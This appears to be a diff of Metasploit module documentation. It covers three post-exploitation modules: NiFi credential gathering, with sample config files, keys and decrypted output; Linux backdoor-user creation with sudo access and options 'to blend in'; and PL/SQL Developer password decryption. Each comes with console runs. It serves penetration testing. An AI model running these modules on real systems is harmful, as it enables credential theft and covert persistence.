|
||||
</authorizer>
|
||||
|
||||
<!--
|
||||
From: https://github.com/benkelly/NiFi-Authentication-with-Azure-Active-Directory-Setup-Guide#configuring-nifi-for-aad-auth
|
||||
-->
|
||||
|
||||
<userGroupProvider>
|
||||
<identifier>aad-user-group-provider</identifier>
|
||||
<class>org.apache.nifi.authorization.azure.AzureGraphUserGroupProvider</class>
|
||||
<property name="Refresh Delay">5 mins</property>
|
||||
<property name="Authority Endpoint">https://login.microsoftonline.com</property>
|
||||
<property name="Directory ID">YOUR_TENANT_ID</property>
|
||||
<property name="Application ID">YOUR_APPLICATION_CLIENT_ID</property>
|
||||
<property name="Client Secret">YOUR_APPLICATION_CLIENT_SECRET</property>
|
||||
<property name="Group Filter Prefix">Nifi-AAD</property>
|
||||
<property name="Page Size">100</property>
|
||||
</userGroupProvider>
|
||||
</authorizers>
|
||||
|
||||
```
|
||||
|
||||
### login-identity-providers.xml
|
||||
|
||||
```xml
|
||||
<loginIdentityProviders>
|
||||
<!--
|
||||
Generated with: ./nifi.sh set-single-user-credentials USERNAME PASSWORDPASSWORD
|
||||
-->
|
||||
<provider>
|
||||
<identifier>single-user-provider</identifier>
|
||||
<class>org.apache.nifi.authentication.single.user.SingleUserLoginIdentityProvider</class>
|
||||
<property name="Username">USERNAME</property>
|
||||
<property name="Password">$2b$12$53nHe2KpVIvWUVwaZft/1.2zOoSxfBkl4pIOXaIoC0QisaYJIZQBe</property>
|
||||
</provider>
|
||||
</loginIdentityProviders>
|
||||
```
|
||||
|
||||
### nifi.properties
|
||||
|
||||
```ini
|
||||
# Core Properties #
|
||||
nifi.flow.configuration.file=./conf/flow.xml.gz
|
||||
nifi.flow.configuration.json.file=./conf/flow.json.gz
|
||||
nifi.flow.configuration.archive.enabled=true
|
||||
nifi.flow.configuration.archive.dir=./conf/archive/
|
||||
nifi.flow.configuration.archive.max.time=30 days
|
||||
nifi.flow.configuration.archive.max.storage=500 MB
|
||||
nifi.flow.configuration.archive.max.count=
|
||||
nifi.flowcontroller.autoResumeState=true
|
||||
nifi.flowcontroller.graceful.shutdown.period=10 sec
|
||||
nifi.flowservice.writedelay.interval=500 ms
|
||||
nifi.administrative.yield.duration=30 sec
|
||||
# If a component has no work to do (is "bored"), how long should we wait before checking again for work?
|
||||
nifi.bored.yield.duration=10 millis
|
||||
nifi.queue.backpressure.count=10000
|
||||
nifi.queue.backpressure.size=1 GB
|
||||
|
||||
nifi.authorizer.configuration.file=./conf/authorizers.xml
|
||||
nifi.login.identity.provider.configuration.file=./conf/login-identity-providers.xml
|
||||
nifi.templates.directory=./conf/templates
|
||||
nifi.ui.banner.text=
|
||||
nifi.ui.autorefresh.interval=30 sec
|
||||
nifi.nar.library.directory=./lib
|
||||
nifi.nar.library.autoload.directory=./extensions
|
||||
nifi.nar.working.directory=./work/nar/
|
||||
nifi.documentation.working.directory=./work/docs/components
|
||||
nifi.nar.unpack.uber.jar=false
|
||||
|
||||
nifi.state.management.configuration.file=./conf/state-management.xml
|
||||
nifi.state.management.provider.local=local-provider
|
||||
nifi.state.management.provider.cluster=zk-provider
|
||||
nifi.state.management.embedded.zookeeper.start=false
|
||||
nifi.state.management.embedded.zookeeper.properties=./conf/zookeeper.properties
|
||||
|
||||
# H2 Settings
|
||||
nifi.database.directory=./database_repository
|
||||
nifi.h2.url.append=;LOCK_TIMEOUT=25000;WRITE_DELAY=0;AUTO_SERVER=FALSE
|
||||
|
||||
# Repository Encryption properties override individual repository implementation properties
|
||||
nifi.repository.encryption.protocol.version=
|
||||
nifi.repository.encryption.key.id=
|
||||
nifi.repository.encryption.key.provider=
|
||||
nifi.repository.encryption.key.provider.keystore.location=
|
||||
nifi.repository.encryption.key.provider.keystore.password=
|
||||
|
||||
# FlowFile Repository
|
||||
nifi.flowfile.repository.implementation=org.apache.nifi.controller.repository.WriteAheadFlowFileRepository
|
||||
nifi.flowfile.repository.wal.implementation=org.apache.nifi.wali.SequentialAccessWriteAheadLog
|
||||
nifi.flowfile.repository.directory=./flowfile_repository
|
||||
nifi.flowfile.repository.checkpoint.interval=20 secs
|
||||
nifi.flowfile.repository.always.sync=false
|
||||
nifi.flowfile.repository.retain.orphaned.flowfiles=true
|
||||
|
||||
nifi.swap.manager.implementation=org.apache.nifi.controller.FileSystemSwapManager
|
||||
nifi.queue.swap.threshold=20000
|
||||
|
||||
# Content Repository
|
||||
nifi.content.repository.implementation=org.apache.nifi.controller.repository.FileSystemRepository
|
||||
nifi.content.claim.max.appendable.size=50 KB
|
||||
nifi.content.repository.directory.default=./content_repository
|
||||
nifi.content.repository.archive.max.retention.period=7 days
|
||||
nifi.content.repository.archive.max.usage.percentage=50%
|
||||
nifi.content.repository.archive.enabled=true
|
||||
nifi.content.repository.always.sync=false
|
||||
nifi.content.viewer.url=../nifi-content-viewer/
|
||||
|
||||
# Provenance Repository Properties
|
||||
nifi.provenance.repository.implementation=org.apache.nifi.provenance.WriteAheadProvenanceRepository
|
||||
|
||||
# Persistent Provenance Repository Properties
|
||||
nifi.provenance.repository.directory.default=./provenance_repository
|
||||
nifi.provenance.repository.max.storage.time=30 days
|
||||
nifi.provenance.repository.max.storage.size=10 GB
|
||||
nifi.provenance.repository.rollover.time=10 mins
|
||||
nifi.provenance.repository.rollover.size=100 MB
|
||||
nifi.provenance.repository.query.threads=2
|
||||
nifi.provenance.repository.index.threads=2
|
||||
nifi.provenance.repository.compress.on.rollover=true
|
||||
nifi.provenance.repository.always.sync=false
|
||||
nifi.provenance.repository.indexed.fields=EventType, FlowFileUUID, Filename, ProcessorID, Relationship
|
||||
nifi.provenance.repository.indexed.attributes=
|
||||
nifi.provenance.repository.index.shard.size=500 MB
|
||||
nifi.provenance.repository.max.attribute.length=65536
|
||||
nifi.provenance.repository.concurrent.merge.threads=2
|
||||
|
||||
|
||||
# Volatile Provenance Respository Properties
|
||||
nifi.provenance.repository.buffer.size=100000
|
||||
|
||||
# Component and Node Status History Repository
|
||||
nifi.components.status.repository.implementation=org.apache.nifi.controller.status.history.VolatileComponentStatusRepository
|
||||
|
||||
# Volatile Status History Repository Properties
|
||||
nifi.components.status.repository.buffer.size=1440
|
||||
nifi.components.status.snapshot.frequency=1 min
|
||||
|
||||
# QuestDB Status History Repository Properties
|
||||
nifi.status.repository.questdb.persist.node.days=14
|
||||
nifi.status.repository.questdb.persist.component.days=3
|
||||
nifi.status.repository.questdb.persist.location=./status_repository
|
||||
|
||||
# Site to Site properties
|
||||
nifi.remote.input.host=
|
||||
nifi.remote.input.secure=true
|
||||
nifi.remote.input.socket.port=
|
||||
nifi.remote.input.http.enabled=true
|
||||
nifi.remote.input.http.transaction.ttl=30 sec
|
||||
nifi.remote.contents.cache.expiration=30 secs
|
||||
|
||||
# web properties #
|
||||
#############################################
|
||||
|
||||
# For security, NiFi will present the UI on 127.0.0.1 and only be accessible through this loopback interface.
|
||||
# Be aware that changing these properties may affect how your instance can be accessed without any restriction.
|
||||
# We recommend configuring HTTPS instead. The administrators guide provides instructions on how to do this.
|
||||
|
||||
nifi.web.http.host=
|
||||
nifi.web.http.port=
|
||||
nifi.web.http.network.interface.default=
|
||||
|
||||
#############################################
|
||||
|
||||
nifi.web.https.host=127.0.0.1
|
||||
nifi.web.https.port=8443
|
||||
nifi.web.https.network.interface.default=
|
||||
nifi.web.https.application.protocols=http/1.1
|
||||
nifi.web.jetty.working.directory=./work/jetty
|
||||
nifi.web.jetty.threads=200
|
||||
nifi.web.max.header.size=16 KB
|
||||
nifi.web.proxy.context.path=
|
||||
nifi.web.proxy.host=
|
||||
nifi.web.max.content.size=
|
||||
nifi.web.max.requests.per.second=30000
|
||||
nifi.web.max.access.token.requests.per.second=25
|
||||
nifi.web.request.timeout=60 secs
|
||||
nifi.web.request.ip.whitelist=
|
||||
nifi.web.should.send.server.version=true
|
||||
nifi.web.request.log.format=%{client}a - %u %t "%r" %s %O "%{Referer}i" "%{User-Agent}i"
|
||||
|
||||
# Filter JMX MBeans available through the System Diagnostics REST API
|
||||
nifi.web.jmx.metrics.allowed.filter.pattern=
|
||||
|
||||
# Include or Exclude TLS Cipher Suites for HTTPS
|
||||
nifi.web.https.ciphersuites.include=
|
||||
nifi.web.https.ciphersuites.exclude=
|
||||
|
||||
# security properties #
|
||||
nifi.sensitive.props.key=pVTBP82AE+ter4iTwZQK7IoYwljtRDVw
|
||||
nifi.sensitive.props.key.protected=
|
||||
nifi.sensitive.props.algorithm=NIFI_PBKDF2_AES_GCM_256
|
||||
nifi.sensitive.props.additional.keys=
|
||||
|
||||
nifi.security.autoreload.enabled=false
|
||||
nifi.security.autoreload.interval=10 secs
|
||||
nifi.security.keystore=./conf/keystore.p12
|
||||
nifi.security.keystoreType=PKCS12
|
||||
nifi.security.keystorePasswd=7fe294b206855e0790d0a198192c3c76
|
||||
nifi.security.keyPasswd=7fe294b206855e0790d0a198192c3c76
|
||||
nifi.security.truststore=./conf/truststore.p12
|
||||
nifi.security.truststoreType=PKCS12
|
||||
nifi.security.truststorePasswd=92691561806e0d5f8ace0e81289a320a
|
||||
nifi.security.user.authorizer=single-user-authorizer
|
||||
nifi.security.allow.anonymous.authentication=false
|
||||
nifi.security.user.login.identity.provider=single-user-provider
|
||||
nifi.security.user.jws.key.rotation.period=PT1H
|
||||
nifi.security.ocsp.responder.url=
|
||||
nifi.security.ocsp.responder.certificate=
|
||||
|
||||
# OpenId Connect SSO Properties #
|
||||
nifi.security.user.oidc.discovery.url=
|
||||
nifi.security.user.oidc.connect.timeout=5 secs
|
||||
nifi.security.user.oidc.read.timeout=5 secs
|
||||
nifi.security.user.oidc.client.id=
|
||||
nifi.security.user.oidc.client.secret=
|
||||
nifi.security.user.oidc.preferred.jwsalgorithm=
|
||||
nifi.security.user.oidc.additional.scopes=offline_access
|
||||
nifi.security.user.oidc.claim.identifying.user=
|
||||
nifi.security.user.oidc.fallback.claims.identifying.user=
|
||||
nifi.security.user.oidc.claim.groups=groups
|
||||
nifi.security.user.oidc.truststore.strategy=JDK
|
||||
nifi.security.user.oidc.token.refresh.window=60 secs
|
||||
|
||||
# Apache Knox SSO Properties #
|
||||
nifi.security.user.knox.url=
|
||||
nifi.security.user.knox.publicKey=
|
||||
nifi.security.user.knox.cookieName=hadoop-jwt
|
||||
nifi.security.user.knox.audiences=
|
||||
|
||||
# SAML Properties #
|
||||
nifi.security.user.saml.idp.metadata.url=
|
||||
nifi.security.user.saml.sp.entity.id=
|
||||
nifi.security.user.saml.identity.attribute.name=
|
||||
nifi.security.user.saml.group.attribute.name=
|
||||
nifi.security.user.saml.request.signing.enabled=false
|
||||
nifi.security.user.saml.want.assertions.signed=true
|
||||
nifi.security.user.saml.signature.algorithm=http://www.w3.org/2001/04/xmldsig-more#rsa-sha256
|
||||
nifi.security.user.saml.authentication.expiration=12 hours
|
||||
nifi.security.user.saml.single.logout.enabled=false
|
||||
nifi.security.user.saml.http.client.truststore.strategy=JDK
|
||||
nifi.security.user.saml.http.client.connect.timeout=30 secs
|
||||
nifi.security.user.saml.http.client.read.timeout=30 secs
|
||||
|
||||
nifi.listener.bootstrap.port=0
|
||||
|
||||
# cluster common properties (all nodes must have same values) #
|
||||
nifi.cluster.protocol.heartbeat.interval=5 sec
|
||||
nifi.cluster.protocol.heartbeat.missable.max=8
|
||||
nifi.cluster.protocol.is.secure=false
|
||||
|
||||
# cluster node properties (only configure for cluster nodes) #
|
||||
nifi.cluster.is.node=false
|
||||
nifi.cluster.node.address=
|
||||
nifi.cluster.node.protocol.port=
|
||||
nifi.cluster.node.protocol.max.threads=50
|
||||
nifi.cluster.node.event.history.size=25
|
||||
nifi.cluster.node.connection.timeout=5 sec
|
||||
nifi.cluster.node.read.timeout=5 sec
|
||||
nifi.cluster.node.max.concurrent.requests=100
|
||||
nifi.cluster.firewall.file=
|
||||
nifi.cluster.flow.election.max.wait.time=5 mins
|
||||
nifi.cluster.flow.election.max.candidates=
|
||||
|
||||
# cluster load balancing properties #
|
||||
nifi.cluster.load.balance.host=
|
||||
nifi.cluster.load.balance.port=6342
|
||||
nifi.cluster.load.balance.connections.per.node=1
|
||||
nifi.cluster.load.balance.max.thread.count=8
|
||||
nifi.cluster.load.balance.comms.timeout=30 sec
|
||||
|
||||
# zookeeper properties, used for cluster management #
|
||||
nifi.zookeeper.connect.string=
|
||||
nifi.zookeeper.connect.timeout=10 secs
|
||||
nifi.zookeeper.session.timeout=10 secs
|
||||
nifi.zookeeper.root.node=/nifi
|
||||
nifi.zookeeper.client.secure=false
|
||||
nifi.zookeeper.security.keystore=
|
||||
nifi.zookeeper.security.keystoreType=
|
||||
nifi.zookeeper.security.keystorePasswd=
|
||||
nifi.zookeeper.security.truststore=
|
||||
nifi.zookeeper.security.truststoreType=
|
||||
nifi.zookeeper.security.truststorePasswd=
|
||||
nifi.zookeeper.jute.maxbuffer=
|
||||
|
||||
nifi.zookeeper.auth.type=
|
||||
nifi.zookeeper.kerberos.removeHostFromPrincipal=
|
||||
nifi.zookeeper.kerberos.removeRealmFromPrincipal=
|
||||
|
||||
# kerberos #
|
||||
nifi.kerberos.krb5.file=
|
||||
|
||||
# kerberos service principal #
|
||||
nifi.kerberos.service.principal=
|
||||
nifi.kerberos.service.keytab.location=
|
||||
|
||||
# kerberos spnego principal #
|
||||
nifi.kerberos.spnego.principal=
|
||||
nifi.kerberos.spnego.keytab.location=
|
||||
nifi.kerberos.spnego.authentication.expiration=12 hours
|
||||
|
||||
# external properties files for variable registry
|
||||
# supports a comma delimited list of file locations
|
||||
nifi.variable.registry.properties=
|
||||
|
||||
# analytics properties #
|
||||
nifi.analytics.predict.enabled=false
|
||||
nifi.analytics.predict.interval=3 mins
|
||||
nifi.analytics.query.interval=5 mins
|
||||
nifi.analytics.connection.model.implementation=org.apache.nifi.controller.status.analytics.models.OrdinaryLeastSquares
|
||||
nifi.analytics.connection.model.score.name=rSquared
|
||||
nifi.analytics.connection.model.score.threshold=.90
|
||||
|
||||
# runtime monitoring properties
|
||||
nifi.monitor.long.running.task.schedule=
|
||||
nifi.monitor.long.running.task.threshold=
|
||||
|
||||
# Enable automatic diagnostic at shutdown.
|
||||
nifi.diagnostics.on.shutdown.enabled=false
|
||||
|
||||
# Include verbose diagnostic information.
|
||||
nifi.diagnostics.on.shutdown.verbose=false
|
||||
|
||||
# The location of the diagnostics folder.
|
||||
nifi.diagnostics.on.shutdown.directory=./diagnostics
|
||||
|
||||
# The maximum number of files permitted in the directory. If the limit is exceeded, the oldest files are deleted.
|
||||
nifi.diagnostics.on.shutdown.max.filecount=10
|
||||
|
||||
# The diagnostics folder's maximum permitted size in bytes. If the limit is exceeded, the oldest files are deleted.
|
||||
nifi.diagnostics.on.shutdown.max.directory.size=10 MB
|
||||
|
||||
nifi.performance.tracking.percentage=0
|
||||
```
|
||||
|
||||
### flow.json.gz
|
||||
|
||||
This file is base64 encoded
|
||||
|
||||
```
|
||||
H4sIAAAAAAAAAJVV227iSBD9lcjPMdO2Adu8kWAySAQQl0Ta1SjqSzn0xLitdpvARPn3rTY2YbPZ
|
||||
HW0eEndVdXWdU1Unbw7kXAmZPz+ALqXKncGbs6M/lT6f/WtnJ/MLA3lHCz2s5Q70SMs95OutBipu
|
||||
VZUbZ+CR2p2g3XzlvnY0PMvSaAmlM/jzx7VTUE13YEDfqtzAwXw2L7TaS4HPn+wco7TKMtAr0HvJ
|
||||
2zQaCqUNQlnT8qWxGdgVGTXnEKXMnVZVYWFiytzIVIJ2Bk6fdhnhDNzUZ7EbxCF1WUzxS7CQ97qx
|
||||
YDR0rh2Zl4bmHCaXdyMSeF2vH7nEi5jrEUJc5ne7+Cvo+z3Cuj6J8W6OaDB6JsfyapypV8dC2e0w
|
||||
EVbn4KlQpTRNDw7IcweZPNZ/kfFCK0Ra1tWfAe+UgcU/HU2sqhn7BBRIFMRe4LuMhZEbAAtc6tO+
|
||||
y70w7rG+gB7r/gfQyE99/wKo8GPhxiLw427qBSzsfQBdb2U5KYe3VWnUbmZtvwHcJ14DOQjiGrQ5
|
||||
FjaT0s8dWlC+hU6OtXQ+8HVslYJq0bkD8329XmBWVuUiA5vz+dTqz/cxhuKgpJTjPDrW4rZp3Jxq
|
||||
dO/bWXe8jh90fOfUgALwmp2lN+ReSA3cuFypFwluoTLJsXJHQEqrzGCSzXKK560xxeDbN88PO9jI
|
||||
jocOHPMcr+IDV3aJVGXLCMhVCRy9I2roV/ZNCbphFufZVO3x2hnjMqjXq2VTkiU3pVlpXQtalq9K
|
||||
C9v4nL+FISWCeH6UEoCoy/o8CsMe97wg7KWMBqQfpZ7fJ1RQxoIoEizoeaTnBZwGIo5AkJBFEPew
|
||||
82FEIaY+5xAw9n5B0HEEJdeyMPX4vaGjNMe6H/YTeyCqDJd0AVoqW1eL78O1MhpX9tmyuZ7cJ8un
|
||||
0XLykMwwBg7AK0vcTAlLxHA6tWMEOc3w3Qqvnbp2Ju0oIRMXDq+xswr1A7ViCnvI0P44XNr8usrb
|
||||
4HuZZRIBkFpweKU1zm12XJ2qpCwDKzMfokYro9agUSqxdrGErM5SbmW7lA0+ECuDEfhmMhveTJOR
|
||||
fRaMPl7Ipz3LL5Mwyl9Umt4D39JcljtMs8A808kfydN4On8cT6aJU+vvzSnyTLNHrrC28rSDhcoR
|
||||
zfq0XYvl/DZZreZL9NUbM/nfwvj+wypGUZkFKnBTKo7v3w38PPaNAVmErPlOK3Rmv1H4PdXSMt/M
|
||||
VbNqVkvHMoPkUMhzo9sBaGIsGwuNmlFpmLOfWIb9p1RuVSYs5fjzZajdxZX8BRfBOEJ3N//O4tPd
|
||||
cr6xKpQ2Vd22w1Orw2Z2M9/MRnXX24h5ZRj2XixaCVmtl8nw/unxezJ7Gj4MJ1M7J877+1/P560I
|
||||
rQcAAA==
|
||||
```
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Install the files, or install NiFi and configure some credential things
|
||||
1. Start msfconsole
|
||||
1. Get a shell on the NiFi system with permission to read the conf files
|
||||
1. Do: `use linux/gather/nifi_credentials`
|
||||
1. Do: `set session [#]`
|
||||
1. Do: `set NIFI_PATH [path]` or `NIFI_PROPERTIES`, `NIFI_FLOW_JSON`, `NIFI_IDENTITY`, and `NIFI_AUTHORIZERS`
|
||||
1. Do: `run`
|
||||
1. You should get any credentials stored by the system
|
||||
|
||||
## Options
|
||||
|
||||
### NIFI_PATH
|
||||
|
||||
The path to the NiFi folder. If the various files are not found in this directory's `conf` folder,
|
||||
the following Options are used to find the files directly. Defaults to `/opt/nifi/`
|
||||
|
||||
### NIFI_PROPERTIES
|
||||
|
||||
NiFi Properties file (`nifi.properties`), if not found in `NIFI_PATH`. Defaults to `/opt/nifi/conf/nifi.properties`
|
||||
|
||||
### NIFI_FLOW_JSON
|
||||
|
||||
NiFi `flow.json.gz` file, if not found in `NIFI_PATH`. Defaults to `/opt/nifi/conf/flow.json.gz`
|
||||
|
||||
### NIFI_IDENTITY
|
||||
|
||||
NiFi `login-identity-providers.xml` file, if not found in `NIFI_PATH`. Defaults to `/opt/nifi/conf/login-identity-providers.xml`
|
||||
|
||||
### NIFI_AUTHORIZERS
|
||||
|
||||
NiFi authorizers file (`authorizers.xml`), if not found in `NIFI_PATH`. Defaults to `/opt/nifi/conf/authorizers.xml`
|
||||
|
||||
## Scenarios
|
||||
|
||||
### Nifi 1.23.2 Using Configuration Files Included in Markdown
|
||||
|
||||
```
|
||||
[msf](Jobs:0 Agents:1) post(linux/gather/nifi_credentials) > run
|
||||
|
||||
[-] /opt/nifi/conf/flow.json.gz not found
|
||||
[*] Found flow.json.gz file /opt/nifi-1.23.2/nifi-1.23.2//conf/flow.json.gz
|
||||
[+] /opt/nifi-1.23.2/nifi-1.23.2//conf/flow.json.gz is readable!
|
||||
[-] /opt/nifi/conf/nifi.properties not found
|
||||
[*] Found nifi.properties file /opt/nifi-1.23.2/nifi-1.23.2//conf/nifi.properties
|
||||
[+] /opt/nifi-1.23.2/nifi-1.23.2//conf/nifi.properties is readable!
|
||||
[+] properties data saved in: /home/h00die/.msf4/loot/20231106144709_default_192.168.2.243_nifi.properties_402421.txt
|
||||
[+] Key: pVTBP82AE+ter4iTwZQK7IoYwljtRDVw
|
||||
[+] Encrypted data saved in: /home/h00die/.msf4/loot/20231106144711_default_192.168.2.243_nifi.flow.json_650473.json
|
||||
[*] Checking root group processors
|
||||
[*] Analyzing of type org.apache.nifi.processors.standard.GetHTTP
|
||||
[*] Decryption initiated for AES-256-GCM
|
||||
[*] Nonce: 77a0d0128f0ee84b6c8775c11375fba3, Auth Tag: 3ca3d98ed07b8e9500078ae9a2cce3bb, Ciphertext: 068f1260adabb388db351051
|
||||
[*] Checking root group controller services
|
||||
[+] Decrypted data saved in: /home/h00die/.msf4/loot/20231106144711_default_192.168.2.243_nifi.flow.decryp_491289.json
|
||||
[*] Checking identity file
|
||||
[-] /opt/nifi/conf/login-identity-providers.xml not found
|
||||
[*] Found login-identity-providers.xml file /opt/nifi-1.23.2/nifi-1.23.2//conf/login-identity-providers.xml
|
||||
[+] /opt/nifi-1.23.2/nifi-1.23.2//conf/login-identity-providers.xml is readable!
|
||||
[*] Checking authorizers file
|
||||
[-] /opt/nifi/conf/authorizers.xml not found
|
||||
[*] Found authorizers.xml file /opt/nifi-1.23.2/nifi-1.23.2//conf/authorizers.xml
|
||||
[+] /opt/nifi-1.23.2/nifi-1.23.2//conf/authorizers.xml is readable!
|
||||
[+] NiFi Flow Values
|
||||
NiFi Flow Data
|
||||
==============
|
||||
|
||||
Name Username Password Other Information
|
||||
---- -------- -------- -----------------
|
||||
ThisIsACustomName testusername testpassword URL: http://127.0.0.1
|
||||
aad-user-group-provider Directory/Tenant ID: YOUR_TENANT_ID, Application ID: YOUR_APPLICATION_CLIENT_ID YOUR_APPLICATION_CLIENT_SECRET From authorizers.xml
|
||||
single-user-provider USERNAME $2b$12$53nHe2KpVIvWUVwaZft/1.2zOoSxfBkl4pIOXaIoC0QisaYJIZQBe From login-identity-providers.xml
|
||||
|
||||
[*] Post module execution completed
|
||||
```
|
||||
@@ -0,0 +1,140 @@
|
||||
## Vulnerable Application
|
||||
|
||||
This module creates a new user using the standard (or non-standard) means of
|
||||
creating a new user on the victim OS. This module requires root privileges
|
||||
in order to run as it needs access to /etc/shadow.
|
||||
|
||||
## Tested Versions
|
||||
|
||||
* Debian 11.7
|
||||
* Alpine 3.17
|
||||
* Fedora 37
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Start msfconsole
|
||||
2. Get a Meterpreter session
|
||||
3. `use post/linux/manage/adduser`
|
||||
4. `set session <id>`
|
||||
5. attempt to log in with account
|
||||
|
||||
|
||||
## Options
|
||||
|
||||
### USERNAME
|
||||
|
||||
Provide the username that can be used. Linux has a standardization that means
|
||||
that password have to follow this regex to be able to be used as a username
|
||||
`^[a-z][a-z0-9_-]{0,31}$`
|
||||
|
||||
### PASSWORD
|
||||
|
||||
Provides a password for your new user.
|
||||
|
||||
### SHELL
|
||||
|
||||
Define the shell that is to be used. Defaults to `/bin/sh` but can be changed
|
||||
to a shell that exists.
|
||||
|
||||
### HOME
|
||||
|
||||
Speficy the home directory of the new user. An empty value specifies that the
|
||||
home directory does not exist.
|
||||
|
||||
### GROUPS
|
||||
|
||||
Specify what groups the new user should be under. Takes one or multiple values
|
||||
to provide what groups the new user will have.
|
||||
|
||||
## Advanced Options
|
||||
|
||||
### SudoMethod
|
||||
|
||||
Sets the method that the new user will get root access. This can be done
|
||||
through multiple methods provided below:
|
||||
|
||||
* **GROUP** - Put the new user in the sudo group (is added automatically to
|
||||
the groups option)
|
||||
* **SUDO_FILE** - Adds user directly to `/etc/sudoers` file in order to
|
||||
prevent being removed from sudoers group
|
||||
* **NONE** - No sudo methods are provided. New user is a unprivileged user
|
||||
|
||||
### UseraddMethod
|
||||
|
||||
Set the method used to create new user.
|
||||
|
||||
* **AUTO** - The default option. The module will figure out how to add in the
|
||||
user by itself.
|
||||
* **MANUAL** - Instead of using a binary on the system, add in the new user
|
||||
directly into the FileSystem. This can be preferred if the binary can be
|
||||
inconsistent or tracked.
|
||||
* **CUSTOM** - Set the custom binary to add in a user. Can be used to pipe
|
||||
auto detection towards a preferred binary such as debians dual choice of
|
||||
useradd and adduser, or alpines busybox.
|
||||
|
||||
### UseraddBinary
|
||||
|
||||
Set the binary used to add the user. The two main binaries concerned with are
|
||||
`useradd` and `adduser`. If you want to overwrite which binary is used or give
|
||||
an absolute path rather than a relative path, you can override it here.
|
||||
|
||||
### MissingGroups
|
||||
|
||||
This option decides how to manage groups requested that are missing on the victim.
|
||||
The possible options are provided as such:
|
||||
|
||||
* **ERROR** - If a group is missing, fail the module with a given error
|
||||
* **IGNORE** - If the group doesnt exist, continue to add the user, but dont add
|
||||
them to the missing groups
|
||||
* **CREATE** - If the group doesnt exist, then make them first then add the user
|
||||
to them
|
||||
|
||||
### PasswordHashType
|
||||
|
||||
Allows the user to decide how their password will be encrypted on the system.
|
||||
The options are between `DES`, `MD5`, `SHA256`, and `SHA512`. This can be
|
||||
advantageous to blend in with the main system by using the same password
|
||||
encryption scheme as the rest of the users. Or if one encryption type isn't
|
||||
compatible with a given target.
|
||||
|
||||
## Scenarios
|
||||
|
||||
```
|
||||
msf6 > use post/linux/manage/adduser
|
||||
msf6 post(linux/manage/adduser) > set session 6
|
||||
session => 6
|
||||
msf6 post(linux/manage/adduser) > set sudomethod GROUP
|
||||
sudomethod => GROUP
|
||||
msf6 post(linux/manage/adduser) > set groups wheel docker wireshark
|
||||
groups => wheel docker wireshark
|
||||
msf6 post(linux/manage/adduser) > set username metasploit
|
||||
username => metasploit
|
||||
msf6 post(linux/manage/adduser) > set password abcd1234
|
||||
password => abcd1234
|
||||
msf6 post(linux/manage/adduser) > set shell /bin/bash
|
||||
shell => /bin/bash
|
||||
msf6 post(linux/manage/adduser) > set home /home/metasploit
|
||||
home => /home/metasploit
|
||||
msf6 post(linux/manage/adduser) > set missinggroups CREATE
|
||||
missinggroups => CREATE
|
||||
msf6 post(linux/manage/adduser) > set verbose true
|
||||
verbose => true
|
||||
msf6 post(linux/manage/adduser) > run
|
||||
|
||||
[-] Groups [docker] do not exist on system
|
||||
[*] Running on Debian 11.7 (Linux 5.10.0-23-amd64)
|
||||
[*] Useradd exists. Using that
|
||||
[*] groupadd docker
|
||||
[*]
|
||||
[+] Added docker group
|
||||
[*] useradd --password $1$WDX5Sg4N$Hcfx4HSigx/KbvtSzhsXD/ --home-dir /home/metasploit --groups wheel,docker,wireshark,sudo --shell /bin/bash --no-log-init metasploit
|
||||
[*]
|
||||
[*] Post module execution completed
|
||||
msf6 post(linux/manage/adduser) > run
|
||||
|
||||
[*] Running on Debian 11.7 (Linux 5.10.0-23-amd64)
|
||||
[*] Useradd exists. Using that
|
||||
[*] useradd --password $1$EVUDKEc3$Sip80MAZmLv.2vOhzW/4k0 --home-dir /home/metasploit --groups wheel,docker,wireshark,sudo --shell /bin/bash --no-log-init metasploit
|
||||
[*] useradd: user 'metasploit' already exists
|
||||
[*] Post module execution completed
|
||||
```
|
||||
@@ -0,0 +1,47 @@
|
||||
## Vulnerable Application
|
||||
|
||||
This module can decrypt the histories and connection credentials of PL/SQL Developer,
|
||||
and passwords are available if the user chooses to remember.
|
||||
|
||||
Analysis of encryption algorithm [here](https://adamcaudill.com/2016/02/02/plsql-developer-nonexistent-encryption/).
|
||||
You can find its official website [here](https://www.allroundautomations.com/products/pl-sql-developer/).
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Download and install PL/SQL Developer.
|
||||
2. (Optional) Change the PL/SQL Developer preference to save the passwords.
|
||||
3. Use PL/SQL Developer to log in to oracle databases. Or add a connection in PL/SQL Developer manually.
|
||||
4. Get a `meterpreter` session on a Windows host.
|
||||
5. Do: `run post/windows/gather/credentials/plsql_developer`
|
||||
6. The username, password, SID of connections will be printed.
|
||||
|
||||
## Options
|
||||
|
||||
**PLSQL_PATH**
|
||||
|
||||
- Specify the path of PL/SQL Developer
|
||||
|
||||
## Scenarios
|
||||
|
||||
```
|
||||
meterpreter > run windows/gather/credentials/plsql_developer
|
||||
|
||||
[*] Gather PL/SQL Developer Histories and Connections on WIN-XXXXXXXXXXX
|
||||
[*] Decrypting C:\Users\Administrator\AppData\Roaming\PLSQL Developer\Preferences\Administrator\user.prefs
|
||||
[*] Decrypting C:\Users\Administrator\AppData\Roaming\PLSQL Developer 14\Preferences\Administrator\user.prefs
|
||||
[*] Decrypting C:\Users\Administrator\AppData\Roaming\PLSQL Developer 15\Preferences\Administrator\user.prefs
|
||||
PL/SQL Developer Histories and Credentials
|
||||
==========================================
|
||||
|
||||
DisplayName Username Database ConnectAs Password FilePath
|
||||
----------- -------- -------- --------- -------- --------
|
||||
[Connections]/Imported Fixed Users/Test sys ORCL SYSDBA pass C:\Users\Administrator\AppData\Roaming\PLSQL Developer 15\Preferences\Administrator\user.prefs
|
||||
[Connections]/Imported History/Test sys ORCL SYSDBA oracle C:\Users\Administrator\AppData\Roaming\PLSQL Developer 14\Preferences\Administrator\user.prefs
|
||||
[LogonHistory] test2 ORCL Normal password2 C:\Users\Administrator\AppData\Roaming\PLSQL Developer\Preferences\Administrator\user.prefs
|
||||
[LogonHistory] test1 ORCL Normal C:\Users\Administrator\AppData\Roaming\PLSQL Developer\Preferences\Administrator\user.prefs
|
||||
[LogonHistory] sys ORCL SYSDBA oracle C:\Users\Administrator\AppData\Roaming\PLSQL Developer\Preferences\Administrator\user.prefs
|
||||
[LogonHistory] user server Normal password C:\Users\Administrator\AppData\Roaming\PLSQL Developer\Preferences\Administrator\user.prefs
|
||||
|
||||
[+] Passwords stored in: C:/Users/Administrator/.msf4/loot/20231109050433_default_127.0.0.1_host.plsql_devel_357810.txt
|
||||
meterpreter >
